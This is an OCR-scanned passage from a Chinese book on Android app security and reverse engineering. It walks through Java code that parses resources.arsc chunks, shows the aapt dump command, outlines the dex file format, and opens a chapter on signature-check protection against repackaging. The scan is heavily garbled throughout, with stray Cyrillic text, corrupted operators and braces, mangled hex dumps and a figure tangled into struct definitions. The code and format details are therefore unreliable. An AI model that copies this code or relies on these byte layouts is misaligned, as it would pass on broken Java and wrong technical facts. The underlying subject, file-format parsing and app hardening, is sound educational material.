XXEESSIES—"MRPARBJNSUS, MERAMI, сеје аа енн КАЙ УТУР, DEARER, = — = 
АЈАЗ АЕНА. 


解析 结果 如 下 : 


parse package chunk... 

pchunkoffset:00 00 04 dO 

package size:288 

package offset:00 00 04 dc 

pkgName: com.qq.e.demo 

typeString:288 

keyString:424 

十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 


解析 资源 类 型 的 字符 串 代 码 如 下 : 


/** 
* 解析 类 型 字符 串 内 容 
* @param src 
“у 
public static void parseTypeStringPoolChunk(byte[] src)t 
System.out.println("typestring offset:"-« 
Utils.bytesToHexString(Utils.int2Byte(typeStringPoolChunkOffset))); 
ResStringPoolHeader stringPoolHeader - 
parseStringPoolChunk(src, typeStringList, typeStringPoolChunkOffset); 
System.out.println("size:"-«stringPoolHeader.header.size); 


这 里 也 是 用 parseStringPoolChunk 方 法 进行 解析 的 ， 同 样 也 需要 用 一 个 字符 串 列 表 存 储 内 容 。 


解析 结果 如 下 : 


parse typestring pool chunk... 
typestring offset:00 өө 05 f@ 
header size:28 

size:136 

flag:00 01 00 00 

string start:40 00 00 00 
style start:00 00 00 00 
string count:9 

style count:e 

string index:00 00 06 30 
str:attr 

str:drawable 

str:layout 

str:color 

str:dimen 

str:string 

str:style 

str:menu 

str:id 

size:136 

TERRE BRE EBRERERERERR*A EA 4A BRE 


6.3.5 ТЕЗЕ ERATES 


解析 资源 值 字符 串 内 容 代 码 如 下 : 


/** 


* 解析 key 字符 串 内 容 
* @param src 
е7 
public static void parseKeyStringPoolChunk(byte[] src)t 
System.out.println("keystring offset:"-« 
Utils.bytesToHexString(Utils.int2Byte(keyStringPoolChunkOffset))); 
ResStringPoolHeader stringPoolHeader = 
parseStringPoolChunk(src, keyStringList, keyStringPoolChunkOffset); 
System.out.println("size:"«stringPoolHeader.header.size); 


// 解析 完 key 字符 串 之 后 ， 需 要 赋值 给 resType 的 偏 移 值 ， 后 续 还 需要 继续 解析 
resTypeOffset = (keyStringPoolChunkOffset+stringPoolHeader.header.size); 


这 里 也 是 使 用 parsestringPoolChunk 方 法 来 解析 ， 解 析 完 之 后 需要 用 一 个 字符 串 询 表 保 仔 ， 后 面 需 要 使 用 系 引 值 来 访问 。 


解析 结果 如 下 : 


parse keystring pool chunk... 
keystring offset:00 00 06 78 
header size:28 

size:1720 

flag:00 01 00 00 

string start:4c 01 00 00 
style start:00 00 00 00 
string count:76 

style count :6 

string index:00 00 07 c4 
str:buttonBarStyle 
str:buttonBarButtonStyle 
str:arrow 

str:gdticon 

str:gridbt 

str:header arrow 

str:iconi 
str:listview item background 
str:logo 

str:main background 
str:activity banner demo 
str:activity fullscreen 
str:activity gdtnativead demo 
str:activity list view 
str:activity main demo 
str:headercontainer 
str:nativelistitem 

str:black overlay 
str:activity horizontal margin 
str:activity vertical margin 
str:app name 

str:hello world 

str:hello banner 

str:menu settings 

str:reload 

str:clearcach 

str:title activity transp 
str:browser 

str:title activity test browser 
str:title activity banner demo 


6.3.0 解析 正文 内 容 


这 里 况 到 的 正文 内 容 融 是 ResValue 值 ， 是 开始 构建 publicxml 中 的 条 目 信 息 ， 和 类 型 的 分 离 不 同 的 XML 文件 ， 所 以 这 部 分 
АЕН ГОРА ла, Д ҺЕ: 


int resCount = 0; 
while(!ParseResourceUtils.isEnd(srcByte.length))( 
resCount-«-«; 
boolean isSpec - ParseResourceUtils.isTypeSpec(srcByte); 


if(isSpec)( 
System.out.println("parse restype spec chunk..."); 
ParseResourceUtils.parseResTypeSpec(srcBytoe); 
System.out.println("++++++++++++++++++++++++++++++++++++++"); 


System.out.println(); 

)else( 
System.out.println("parse restype info chunk..."); 
ParseResourceUtils.parseResTypeInfo(srcByte); 
System.out.println("++++++++++++++++++++++++++++++++++++++"); 


System.out ..println(); 


) 


System.out.println("res count:"-«resCount); 


这 里 有 一 个 循环 解析 ， 有 两 个 方法 ， 一 个 是 isEnd 方 法 ， 另 一 个 是 isTypeSpec 方 法 。 
如 果 仔 细 看 前 面 的 图 6-3， 就 可 以 看 到 后 面 的 ResType 和 ResTypeSpec 两 个 内 容 是 交替 出 现 的 ， 直 到 文件 结束 。 
所 以 isEnd 方 法 就 是 判断 是 否 到 达 文 件 结束 位 置 : 


/** 
* 判断 是 否 到 文件 末尾 了 
* @param length 
* Qreturn 
ui i 
public static boolean isEnd(int length)(í 
if(resTypeOffset»-lengtnh)(í 
return true; 


) 


return false; 


还 有 一 个 方法 就 是 判断 是 ResType 还 是 ResTypeSpec， 这 可 以 通过 Chunk 中 头 部 信息 来 区 分 的 : 


/** 
* 判断 是 不 是 类 型 描述 符 
* @param src 
* @return 
ud i 
public static boolean isTypeSpec(byte[] src)t 
ResChunkHeader header = parseResChunkHeader(src, resTypeOffset); 
if (header.type == 0х0202) { 
return true; 
} 


return false; 


下 面 分 别 来 解析 ResTypeSpec 和 ResType 这 两 个 内 容 。 
1. 解 析 ResTypeSpec 


主要 得 到 Res 的 每 个 类 型 名 : 
z * ж 
* 解析 ResTypeSepc 类 型 描述 内 容 
* @рагаш src 
ЫА 
public static void parseResTypeSpec(byte[] зүс) { 
System.out.println("res type spec offset:"+ 
Utils.bytesToHexString(Utils.int2Byte (resTypeOffset))); 
ResTableTypeSpec typeSpec = new ResTableTypeSpec(); 
/ / 解析 头 部 信息 
typeSpec.header = parseResChunkHeader(src, resTypeOffset); 
int offset = (resTypeOffset + typeSpec.header.getHeaderSize()); 
// 解析 ia 类 型 
byte[] idByte = Utils.copyByte(src, offset, 1); 
typeSpec.id = (byte)(idByte[0] & OxFF); 
resTypeld = typeSpec.id; 


к. 始终 是 

byte[] resOByte = Utils. к offset+1, 1); 
typeSpec.res0 = (byte)(resOByte[0] & 

// 解析 resi FR, x4 AERE 的 ， 始 终 是 

byte[] reslByte = pai offset+2, 2); 
typeSpec.resl = Utils.byte2Short (reslByte),， 

//entry 的 总 个 数 

byte[] entryCountByte = Utils.copyByte (src, offset+4, 4); 
typeSpec.entryCount = Utils.byte2int (entryCountByte); 
System.out.println("res type spec:"+typeSpec); 
System.out.println("type name:"-«typeStringList.get(typeSpec.id-1)); 
/ / 获取 entryCount ^^ int 数组 

int[] intAry = new int[typeSpec.entryCount]; 

int intAryOffset = resTypeOffset + typeSpec.header.headerSize; 
System.out.print("int element:"); 


for(int i2z0;i«typeSpec.entryCount;i-c-«)fí 
int element = Utils.byte2int(Utils.copyByte(src, intAryOffset-«i*4, 4)); 
intAry[i] = element; 
System.out.print(element-s","); 

} 

System.out.println(); 

resTypeOffset += typeSpec.header.size; 


解析 结果 如 下 : 


parse restype spec chunk... 

res type spec offset:00 өө Od зе 

res type spec:header:type:00 00 02 02 ,headerSize:16,size:24,id:1,res0:0,res1:0,entryCount:2 
type name:attr 

int element:0,0, 

++++++++++++++++++++++++++++++++++++++ 


2. 解 析 ResType 


主要 得 到 每 个 res 类 型 的 所 有 条 目 内 容 : 


/** 
* 解析 类 型 信息 内 容 
* @param src 
i 
public static void parseResTypeInfo(byte[] src)t 
System.out.println("type chunk offset:"- 
Utils.bytesToHexString(Utils.int2Byte(resTypeOffset))); 
ResTableType type = new ResTableTvype(); 
// 解析 头 部 信息 
type.header = parseResChunkHeader(src, resTypeOffset); 


int offset = (resTypeOffset + type.header.getHeaderSize()); 


// 解析 type W іа fü 
byte[] idByte = Utils.copyByte(src, offset, 1); 
type.id = (byte)(idByte[0] & OxFF); 


// 解析 reso 字段 的 值 ， 备 用 字段 ， 始 终 是 0 
byte[] res0 = Utils.copyByte(src, offset+1, 1); 
type.res0 = (byte) (res0[0] & 0хЕЕ); 


// 解析 resl 字段 的 值 ， 备 用 字段 ， 始 终 是 0 
byte[] resl = Utils.copyByte(src, offset+2, 2); 
type.resl = Utils.byte2Short (res1); 


byte[] entryCountByte = Utils.copyByte(src, offset+4, 4); 
type.entryCount = Utils.byte2int (entryCountByte); 


byte[] entriesStartByte = Utils.copyByte(src, offset«8, 4); 
type.entriesStart = Utils.byte2int(entriesStartByte); 


ResTableConfig resConfig - new ResTableConfig(); 

resConfig = parseResTableConfig(Utils.copyByte(src, offset-c12, resConfig. 
бекетте 

System.out.println("config:"+resConfigo); 


System.out.println("res type info:"+type); 
System.out.println("type name:"-«typeStringList.get(type.id-1)); 


/ / 先 获取 entryCount 个 int 数组 
System.out.print("type int elements:"); 
int[] intAry = new int[type.entryCount]; 
for(int i2z0;i«type.entryCount;i-«-«)( 
int element - 
Utils.byte2int(Utils.copyByte(src, resTypeOffset-«type.header. 
headerSize-ci*4, 4)); 
intAry[i] = element; 
System.out.print(element-s","); 
) 
System.out.println(); 


// 这 里 开始 解析 后 面 对 应 的 ResEntry 和 ResValue 

int entryAryOffset = resTypeOffset + type.entriesStart; 

ResTableEntry[] tableEntryAry = new ResTableEntry[type.entryCount]; 

ResValue[] resValueAry = new ResValue[type.entryCount]; 

System.out.printlin("entry offset:"-«4Utils.bytesToHexString(Utils. 
int2Byte(entryAryOffset))); 


// 这 里 存在 一 个 问题 就 是 如 果 是 ResMapEntry 的 话 ， 
// 偏 移 值 是 不 一 样 的 ， 所 以 这 里 需要 计算 不 同 的 偏 移 值 
int bodySize = 0, valueOffset = entryAryOffset; 
for(int i=0;i<type.entryCount;i++){ 
int resId = getResId(i); 
System.out.println("resId:"-«Utils.bytesToHexString(Utils. 
int2Byte(resId))); 
ResTableEntry entry - new ResTableEntry(); 
ResValue value - new ResValue(); 
valueOffset += bodySize; 
System.out.println("valueOffset:"-c4Utils.bytesToHexString(Utils. 
int2Byte(valueOffset))); 
entry - parseResEntry(Utils.copyByte(src, valueOffset, entry.getSize())); 


// 这 里 需要 注意 的 是 ， 先 判断 entry 的 flag 变量 是 否 为 1， 如果 为 1 的 话 ， 
// 那 就 ResTable_map_entry 
if(entry.flags == 1){ 


// 这 里 是 复杂 类 型 的 value 
ResTableMapEntry mapEntry = new ResTableMapEntry(); 
mapEntry - parseResMapEntry( 
Utils.copyByte(src, valueOffset, mapEntry.getSize())); 
System.out.println("map entry:"-«mapEntry); 
ResTableMap resMap - new ResTableMap(); 
for(int j20;j«mapEntry.count;j-«-)í( 
int mapOffset = valueOffset + mapEntry.getSize() + resMap. 
getSize()*j; 
resMap - parseResTableMap( 
Utils.copyByte(src, mapOffset, resMap.getSize())); 
System.out.println("map:"-«resMap); 
} 
bodySize = mapEntry.getSize() + resMap.getSize()*mapEntry.count; 
Jelse( 
System.out.println("entry:"-«entry); 
// 这 里 是 简单 的 类 型 的 value 
value = parseResValue( 
Utils.copyByte(src, valueOffset+entry.getSize(), value.getSize())); 
System.out.println("value:"+value); 
bodySize = entry.getSize()+value.getSize(); 


tableEntryAry[1] = entry; 
resValueAry[i] = value; 


SyStem;,ouut @ priyintln(T======================================wy 
) 
resTypeOffset += type.header.size; 


看 到 这 里 ， 友 现 解 析 很 复杂 ， 和 在 讲解 数据 结构 的 时 候 一 样 ， 需 要 解析 很 多 内 容 : ResValue、ResTableMap、 
ResTableMapEntry、ResTableEntry、ResConfig。 关 于 每 个 数据 结构 如 何 解 析 这 里 就 不 多 说 了 ， 束 是 读 取 字 节 即 可 。 这 里 有 


一 个 核心 的 代码 : 


// 这 里 需要 注意 的 是 ， 先 判断 entry 的 flag Ж €x 0 1, 
// 如 果 为 1 的 话 ， 那 就 ResTable мар entry 
if(entry.flags == 1){ 
// 这 里 是 复杂 类 型 的 value 
ResTableMapEntry mapEntry = new ResTableMapEntry(); 
mapEntry = parseResMapEntry(Utils.copyByte(src, valueOffset, mapEntry. 
getSize())); 
System.out.println("map entry:"-«mapEntry); 
ResTableMap resMap - new ResTableMap(); 
for(int j20;j«mapEntry.count;j-«-«)í( 
int mapOffset = valueOffset + mapEntry.getSize() + resMap.getSize()*j; 
resMap = parseResTableMap(Utils.copvByte(src, mapOffset, resMap. 
getSize())); 
System.out.println("map:"-«resMap); 
} 
bodySize = mapEntry.getSize() + resMap.getSize()*mapEntry.count; 
}else{ 
System.out.println("entry:"+entry); 
// 这 里 是 简单 的 类 型 的 value 
value = parseResValue (Utils.copyByte(src, valueOffset+entry.getSize(), 


value.getSize())); 
System.out.printlin("value:"-«value); 
bodySize = entry.getSize()-«value.getSize(); 


判断 flag 的 值 来 进行 不 同 的 解析 操作 。 需 要 注意 这 点 . 


解析 结果 如 下 : 


parse restype info chunk... 

type chunk offset:00 өө 0d 48 

config:size:48,mcc-0,10cale:0,screenType:0, input:0,screenSize:0,version:0,sdkVersion:0,minVersion:0,screenConfig:0,screenLayout:0,uiMode:0,smallestScreenWidthDp:0,screenSizeDp:0 
res type info:header:type:00 00 02 01 ,headerSize:68,size:132,id:1,res0:0,res1:0,entryCount:2,entriesStart:76 
type name:attr 

type int elements:0,28, 

entry offset:00 00 ёа 94 

resId:7f 01 00 00 

valueOffset:00 өө ва 94 

map entry:size:16,flags:1,key:index:0,str:buttonBarStyle,parent:ident:0x00 00 00 00 ,count:1 

map:ident:0x01 00 00 ӨӨ ,value:size:8,res0:0,dataType:TYPE FIRST INT,data:1 


resId:7f 01 ee ei 

valueOffset:00 өө Əd bð 

map entry:size:16,flags:1,key:index:1,str:buttonBarButtonStyle,parent:ident:@x@@ 00 00 00 ,count:1 
тар:ідепё:Өхё1 00 00 00 ,value:size:8,res0:0,dataType:TYPE FIRST INT,data:1 


十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 


parse restype spec chunk... 

res type spec offset:00 00 ed cc 

res type spec:header:type:00 00 02 02 ,headerSize:16,size:48,id:2,res0:0,res1:0,entryCount:8 

type name:drawable 

int element:0,0,0,0,0,0,0,0, 

十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 

parse restype info chunk... 

type chunk offset:00 00 Od fc 
config:size:48,mcc-0,1ocale:0,screenType:0,input:0,screenSize:0,version:0,sdkVersion:0,minVersion:0,screenConfig:0,screenLayout:0,uiMode:0,smallestScreenWidthDp:0,screenSizeDp:0 
res type info:header:type:00 00 02 01 ,headerSize:68,size:228,id:2,res0:0,res1:0,entryCount:8,entriesStart:100 
type name:drawable 

type int elements:0,16,32,48,64,80,96,112, 

entry offset:00 00 0e 60 

resId:7f 02 00 00 

valueOffset:00 00 0e 60 

entry:size:8,flags:0,key:index:2,str:arrow 

value:size:8,res0:0,dataType:TYPE STRING,data:res/drawable/arrow.png 


resId:7f 02 00 01 

valueOffset:00 00 0e 70 

entry:size:8,flags:0,key:index:3,str:gdticon 
value:size:8,res0:0,dataType:TYPE STRING,data:res/drawable/gdticon.png 


看 到 解析 结果 还 是 挺 欣 慰 的 ， 因 为 最 难 的 地 方 解 析 成 功 了 ， 这 就 是 想 要 的 结果 。 需要 解释 的 是 ， 有 了 这 些 值 构建 
public.xml 内 容 和 各 个 类 型 的 XML 内 容 就 很 简单 了 。 


注意 ， 这 里 Resld 的 构造 方法 是 : 


/ * x< 
* 获取 资源 id 
х 这 里 高 位 是 packid， 中 位 是 restypeid， 地 位 是 entryiq 
* @param entryid 
* @return 
ы 
public static int getResId(int entryid)( 
return (((packrid)««24) | (((resTypeid) & OxFF)««16) | (entryid & OxFFFF)); 


可 以 看 到 一 个 int 类 型 的 resld， 它 的 最 高 两 个 字 节 表示 packld， 系 统 资 源 id 是 0x01， 普 通 应 用 资源 id 是 0x7F。 它 的 中 间 的 两 
个 字 节 表示 resTypeld， 类 型 id， 这 个 值 从 0 开始 ， 比 如 例子 中 第 一 个 类 型 是 attr， лла 它 的 最 低 四 个 字 
节 表 示 这 个 资源 的 顺序 id， 从 1 开始 ， 逐 渐 累 加 1。 


提示 : 项 目下 载 地 址 : https: / / github.com/fourbrother/parse_androidarsc 
上 面 就 解析 完了 所 有 的 resource.arsc 文 件 ， 解 析 resource.arsc 文 件 格式 的 目的 有 两 个 : 


在 使 用 apktool 工 具 进 行 反 编 译 的 时 候 ， 经 常 出 现 一 些 莫 名 的 异常 信息 ， 最 多 的 就 是 NotFound ResId 0x0000XXX 这 些 内 容 。 


那么 这 时 候 就 需要 修复 ， 当 然 可 以 得 到 apktool 的 源码 来 解决 这 个 问题 ， 还 可 以 使 用 目 己 写 的 这 套 解 析 代 码 。 


- 解析 tesoutce.atsc 文 件 之 后 ， 对 tesoutce.atsc 文 件 格式 如 果 有 了 解 ， 可 以 对 资源 文件 名 进行 混 消 ， 从 而 减 小 apk 包 大 小 。 因 为 
META-INE 文 件 夹 下 的 三 个 文件 体积 很 大 ， 原 因 就 是 它们 内 部 保存 了 每 个 资源 名 称 ， 在 项 目 中 有 时 候 为 了 不 造成 冲突 ， 就 把 资源 
名 起 的 很 长 ， 那 么 这 样 就 会 导致 apk 的 包 很 大 。 同 样 fesoutce.afsc 文 件 也 会 很 大 ， 因 为 资源 名 都 是 需要 保存 的 ， 但 是 Andtoid 中 的 混 
消 是 不 会 对 资源 文件 进行 混淆 的 ， 所 以 这 时 候 就 可 以 通过 这 个 思路 来 减 小 包 apk 的 大 小 了 。 


在 前 面 一 章 中 已 经 介绍 了 关于 aapt 命 令 的 用 法 了 ， 这 里 依然 可 以 利用 aapt 命 令 解析 arsc 文 件 ， 用 aapt 命 令 很 简单: 


aapt 1 -a apk 名称 > demo.txt 


将 输入 的 结果 定向 到 demo.txt 中 ， 如 图 6-7 所 示 。 


G:'Mizsers*jiangueii-g?»cd С: “Users™”"ijiangweil—og“Desktop™ 
G:Mizsers*jiangueii-g-Desktop?»aapt 1 -a demo.apk > demo.txt 
Сі Misers*-jiangweii-gy-Dezsktop?start demo.txt 
G:Mizers*jiangueii-g-Desktop?»start demo .txt 


Сі “Users™”"jiangweil—og“Desktop» 


“| demo.txt - 记事 本 


МЕҢЕ) 编辑 (E) ELO) EEV) 帮助 (H) 


Package Group 0 1d4=0x7£ packagetoumt=] name-tinker. sample. android 
Package 0 id-üxTf name-tinker. sample. android 
type 1 confizCnunt-4 entryCount-l 

spec resource ÜxTfÜüZz0000 tinker. sample. androld:drawable/ic launcher: flazgs=0x00000100 
config mdpi-vd: 

resource ÜxTfÜZO0000 tinker. sample. android:drawable/ic launcher: t=0x03 d-0x00000002 (5=0х0008 т=0х00) 
config hdpi-vd: 

resource ÜxTfÜZÜOO0 tinker. sample. android:drawable/ic launcher: 1=0х03 4=0х00000004 (s=0z0008 г=0х00) 
config xhdpi-v4: 

resource ÜxTfÜZÜOO0 tinker. sample. android:drawable/ic launcher: 1=0х03 4=0х00000006 (s=0z0008 г=0х00) 
config xxhdpi-vd: 

resource ÜxTfÜZÜOO0 tinker. sample. android:drawable/ic launcher: 1=0х03 d=0z00000008 (s=0z0008 г=0х00) 

type 2 confizCnunt-5 entryCount-l 

spec resource ÜxTfÜS0000 tinker. sample. androld:mipmap/ic launcher: flazs-üxü0000100 
config mdpi-vád: 

resource ÜxTfÜS0000 tinker. sample. android:mipmap/ic launcher: 1=0х03 4=0х00000003 (s=0z0008 r=0x00) 
confiz hdpi-vd: 

resource ÜxTfÜ30000 tinker. sample. android:mipmap/ic launcher: 1=0х03 4=0х00000005 (s-0x0008 r=0x00) 
config xhdpi-v4i: 

resource OxTf030000 tinker. sample. android:mipmap/ic launcher: t=0x03 4=0х00000007 (==0х0008 r=0x00) 
config xxhdpi-vd: 

resource ÜxTfÜS0000 tinker. sample. android:mipmap/ic launcher: 1=0х03 4=0х00000009 (s-0x0008 r=0x00) 
config xxxhdpi-vd: 


resource üxTfüSDO00 tinker. sample. android:mipmap/ic launcher: t-üxüs 4=0х0000000а (s=0z0008 г=0х00) 


6-7 用 aapt 命 令 输 出 结果 


看 到 内 容 就 是 上 面 解 析 的 AndroidManifest.xml 内 容 ， 所 以 这 也 是 一 个 解析 方法 。 为 何 aapt 命 令 最 后 说 呢 ? 因为 了 解 
AndroidManifest.xml 格 式 能 更 好 地 掌握 解析 方法 。 以 后 记得 有 一 个 aapt 命 令 就 好 了 ， 它 的 用 途 很 多 ， 可 以 单独 编译 成 一 个 


resource.arsc 文 件 来 ， 后 面 会 用 到 这 个 命令 。 


第 / 章 dex 文件 格式 解析 


前 几 章 介绍 了 so 文件 、AndroidManifest 文 件 、resources 文 件 ， 本 章 将 介绍 dex 文 件 格 式 的 解析 。 了解 dex 文 件 格 式 对 后 面 的 应 用 


安全 防护 非常 有 用 。 


71 dex 文 件 格式 


下 面 来 看 一 下 dex 文 件 格式 说 明 图 ， 如 图 7-1 所 示 。 


DexHeader 1 


ul тағіс[8]; f/* includes version number */ 
888886888: CF 5F 03 89 БЕ Cñ FC fh dex.835 ES REG ud checksum; /* adler32 checksum */ 
00000010: |18 D8 88 55 26 A4 F1 38 C5 47 F5 FA D2 А2 óF 86 Aue. 2 в то ul signature[kSHAlDigestLen]: /* $НА-1 hash */ 
000000260: |30 83 88 88 780 во во 88 78 56 34 12 880 88 88 688 | pun зү, [ii ОРЫ u4 fileSize: ўж length of entire file */ 
808000830:||00 86 ай өв 98 62 ве ве 1A AA AA AA 768 AA AA AA 2 i ud headerSize; Їж offset to start of next section */ 
888888548: ud endianTag; 
00000050: 1101 во ов GB FC ве өв ве B5 AA AA AA G4 01 AA AA || ....?.. == ud linkSize; 
88888868: 04 linkÜff; 
888880878: 04 mapÜff; 
88888888: u4 stringldsSize; struct DexFieldId £ 
8886868890: u4 stringIdsOff; nd classi 
800000n0: yp passes: KFZ эй 
68999669B8: 4 typeldsOff; 0. ев. 
000000с0: | 


protoldsSize; 
8886888D 6: H. u4 protoldsÜff; 
888888E 0: w4 £fieldldsSire: 
888888F 8: u4 £fieldIdsOff: 
86666169:| ВЕ 88 88 88 v4 methodldsSire: | 


+ struct DexMethodId { 


P M 

88888118:| ƏC 88 | „207 DexTypeld u4 methodIdsOff; 

eset ig ENS DexTypelId í u$ classDefsSize; M Кз; 

08080138: ж rem 4 clessDefsOff: © кошы 
: ud descriptorIldx; Шы oen ; ud nmnameldx; 

888881548: ud dataSize; 


M d 


ee. SD... b. 3EOxA 4 DexProtoId 


88880158: 
888680168: 
888680178: 


ud datalff; 


60 OO ВЕ ве 05 ве 01 ве өз өв өв DB 6с 62 BO вө 
11 88 860 88 22 ве в1 ве 70 18 өө OB BO DB 62 81 


00000180:| 00 88 12 52 12 33 6E 38 01 00 20 03 Bñ 6E 28|| ...R.3n8. WX. ..n — 从 0x12c 开 始 ， 共 0x1 个 DexClassDet 
80080198:| 03 88 01 OA GE вв өв өв 05 OA 03 во вв өв ов вө || ............^ xs ot Шато о 

888881608: 74 82 88 88 86 85 91 t ipepe nennu о PERE, Б. 14 shortyIdx; struct DexClassDef í 

888801B8:| B2 COSE CR NER returnTypeIdx; ud classIdx; Їж index into typeIlds for this class */ 
008001C8:| UU UU Өр, .00.(01..08..00. 00, по пи: 06 3C 69 6E 69 7h| | ........... Gnit A Hé Sea: 


ui superclassIdx;/* index into typeIds for superclass */ 
ui interfacesDff;/* file offset to DexTypelist */ 
ui sourceFileIdx;/* index into stringIds for source file name */ 


888801D8: 
888801E8: 
888881F 8: 
888868288: 
888088218: 
000002286: 


3E 88 ВА ^8 65 6C 6C óF 2E 
80 03 49 49 49 00 07 4C 48 65 6C 6C óF ЗВ 88 15 
4C 6ñ 61 76 61 2F 69 óF 2F 58 72 69 GE 74 53 74 
72 65 61 6D ЗВ 88 12 hC ба 61 76 61 2F 6C 61 6E 
67 2F hF 62 ő 65 63 74 ЗВ 88 12 4C ба 61 76 61 
2F óC 61 6E 67 2F 53 79 73 7^ 65 6D ЗВ 88 81 56 


> ..Не110.јауа..1 
--III..LHello;.. 
Ljava/io/PrintSt 
ream;..Ljauva/1lan 
g/übject;..Ljava 
/lang/System;..U 


u4 annotationsÜff;/* file offset to annotations directory item */ 
ud classDataO0ff; /* file offset to class data item */ 
u4 staticValuesÜff;/* file offset to DexEncodedArray */ 


struct DexTypeItem { 
u2  typeIldx; 


É 


88888238:| 00 02 56 49 00 82 56 4C 88 13 5B 4C ба 61 76 61|| ..UI..UL..[Ljava 

88888248:| 2F 6C 61 6E 67 2F 53 74 72 69 6E 67 ЗВ 88 03 őő || /lang/String;..f 

60800258:| 6F óF 88 85 6D 61 69, ДЕ, 80. 03. АЕ. 25. 7.5..80..82. 20.| | оо. .main..out..p |struct DexTypelist 1 注 章 : 

88888268: 72.69, .6E..74.60..6F..08:61 88 87 ВЕ 88 87 81 88 97 || rintln.......... ut sire; 

888808270:| ВЕ Ба B^ 88 Өз 02 88 OG 07 BE O во 88 82 G1 88 DexTypeItem list[1]; 甚 它 没有 列 出 的 常量 与 结构 定义 可 以 在 以 下 文件 中 碍 看 


struct 
DexMapItem { 


80088288:| 81 80 04 
000002986: 
8886002600: 
00000286: 
08080268: 
000002р6: 
880882E8: 
8886882F 8: 
000003086: 
000003186: 
000003286: 


CC 82 82 89 Ен 82 Android Es dalvikMibdexADexFile.h 


81 вв 68 
07 ве ве ве BB ве 668 вв өз ов ов DO ол ве вө 
сс вв өв ов 6^ OA ве ве в1 ве 68 668 FC өв өв вө 
05 во 60 ве 05 ве 68 OA A4 61 өв ов во AA вө вө 
81 880 ве ве 2с 91 88 88 81 28 өв ве 63 ве 68 
4C 81 80 OA 01 10 ве ве 03 ве 68 86 B^ 61 өв ве 
02 20 ве ве 18 ве 68 ве са 61 өв өв өз 20 68 в 

03 880 OG ве 67 802 ве ве AG 20 өв ов 61 66 68 в 
7B 02 ов BO өв 10 ве ве 01 58 82 808 


struct DexMapList { 


ише сеш у 
加 点 虚线 分 隔 结构 块 中 相同 类 型 的 结构 体 


ud size; 
DexMapItem list[1]; 


图 7-1 dex 文 件 格 式 〈 见 书后 彩 图 ， 图 片 H @3E RIA) 


dex 的 文件 格式 如 图 7-2 所 示 。 


文件 头 


FIRKASI 
关 型 的 条 5 
AARE RRS 
域 的 索引 
方法 的 索引 


索引 区 


类 的 定义 区 


效 据 区 


link_data 链接 数据 区 


图 7-2 dex 文件 格式 


75 ”本 童 小 结 


本 章 主 要 介绍 了 Andtoid 中 的 dex 文 件 格式 ， 关 于 dex 文 件 格式 的 重要 性 不 必 多 言 ， 如 果 能 深入 了 解 dex 文 件 格式 ， 在 后 续 的 加 
应 用 和 逆向 应 用 的 时 候 非常 有 用 ， 比 如 一 些 应 用 通过 前 期 改变 dex 的 数据 结构 来 进行 加 国 应 用 ， 然 后 在 内 存 中 恢复 数据 结构 ， 
要 想 逆 向 这 样 的 应 用 就 需要 熟练 地 掌握 dex 的 数据 结构 知识 。 有 时 候 还 想 在 内 存 中 篡改 指令 来 改变 代码 逻辑 ， 这 时 候 也 需要 通过 
分 析 dex 的 数据 结构 来 找到 相对 应 的 内 存 指令 位 置 ， 然 后 进行 数据 修改 。 


Рв 


第 8 章 Android 应 用 安全 防护 的 基本 策略 
RIF Android 中 常用 权限 分 析 

第 10 章 Android 中 的 run-as 命 令 

第 11 章 Android 中 的 alowBackup 属 性 

第 12 章 Android 中 的 签名 机 制 

第 13 章 Android 应 用 加 固原 理 


第 14 章 Android 中 的 so 加 固原 理 


第 8 草 ” Android 应 用 安全 防护 的 基本 策略 


本 章 主要 介绍 在 开发 一 个 应 用 的 时 候 ， 可 以 通过 哪些 方式 给 应 用 做 安全 防护 ， 包 括 以 下 几 个 方式 : 混淆 、 签 名 保护 、 手 动 注 
册 native 方 法 、 反 调试 检测 ， 通 过 这 些 方式 能 够 给 应 用 加 上 很 强 的 一 层 保护 壳 ， 因 此 这 几 种 方式 在 现代 很 多 应 用 中 都 会 使 用 到 。 


82 ”签名 保护 


Android 中 的 每 个 应 用 都 有 一 个 唯一 的 签名 ， 如 果 一 个 应 用 没有 被 签名 是 不 允许 安 闪 到 设备 中 的 ,一 般 在 运行 debug 程 序 的 
时 候 也 是 有 默认 的 签名 文件 的 ， 只 是 1DE 帮 开 友 者 做 了 签名 工作 ， 在 应 用 友 版 的 时 候 会 用 唯一 的 签名 文件 进行 签名 。 那 么 在 以 往 
的 破解 中 可 以 看 到 ， 有 时 候 需 要 在 反 编译 应 用 之 后 ， 重 新 签名 再 打包 运行 ， 这 又 给 很 多 二 次 打包 团队 谋取 利益 提供 了 一 种 手段 。 
就 是 有 反 编译 市 场 中 的 包 ， 然 后 添加 一 些 广 告 代码 ， 最 后 使 用 目 家 的 签名 重新 打包 友和 布 到 市 场 中 ， 因 为 签名 在 反 编译 之 后 是 获取 不 
到 的 ， 所 以 只 能 用 目 己 的 签名 文件 去 签名 ,但 是 在 已 经 安 痰 了 应 用 设备 再 去 安 六 一 个 签名 不 一 任 的 应 用 会 导致 安装 失败 ， 这 样 也 
有 一 个 问题 就 是 有 些 用 户 安 容 了 这 些 二 次 打包 的 应 用 之 后 ， 无 法 再 安 闪 正 规 的 应 用 了 ， 只 有 季 载 重 洲 。 根 据 这 个 原理 可 以 利用 应 
用 的 签名 是 唯一 的 特性 做 一 层 防护 。 


为 了 防止 应 用 被 二 次 打包 ， 在 程序 入 口 处 添加 釜 名 验证 ， 如 果 友 现 应 用 的 签名 不 正确 束 立 即 退 出 程序 ， 可 以 在 应 用 局 动 的 时 
候 获 取 应 用 的 签名 值 ， 然 后 和 正确 的 签名 值 作 比 对 ， 如 果 不 符 合 束 直接 退出 程序 。 下 面 做 一 个 简单 的 案例 测试 一 下 ， 如 下 所 示 : 


private static final String 应 用 的 正确 签名 值 ， 为 了 方便 ， 这 


public static String getSignature() í SUL — тау EIE Г 
Context ctx - MyApplication.getMyContext(); 
tiy d 
/** 通过 包 管 理 器 获得 指定 包 名 包含 签名 的 包 信息 **/ 
PackageInfo packageInfo = ctx.getPackageManager().getPackageInfo(ctx. 
getPackageName(), 


PackageManager.GET SIGNATURES); 
